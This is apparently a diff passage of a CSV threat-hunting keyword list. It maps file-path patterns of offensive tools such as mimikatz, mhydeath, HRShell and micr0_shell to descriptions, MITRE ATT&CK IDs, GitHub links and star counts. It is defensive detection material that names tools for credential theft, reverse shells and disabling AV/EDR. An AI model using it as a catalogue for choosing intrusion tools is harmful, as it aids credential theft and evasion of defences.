It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/meterpreter/reverse_tcp*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/MFASweep.git*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" -"*/mhydeath.git*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*/mhydeath.sln*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs 
/ XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*/mhydeath/main.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath.git*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath.sln*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath/main.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/michaelweber/Macrome*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/micr0%20shell.py*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "*/micr0_shell.git*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" -"*/MicroBurst.git*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*/MicroBurst.git*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*/mikrotik-routeros-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimicom.idl*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. 
mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimicom.idl*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*/mimikatz.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" -"*/mimikatz.sln*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_bypass/mimikatz.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_bypass/mimikatz2.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. 
mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_bypassAV/main.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_bypassAV/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimilib.def*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimilove.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimilove.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimilove.rc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimipenguin.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/mimikatz.sln*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypass/mimikatz.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypass/mimikatz2.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypassAV/main.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypassAV/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilib.def*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.rc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
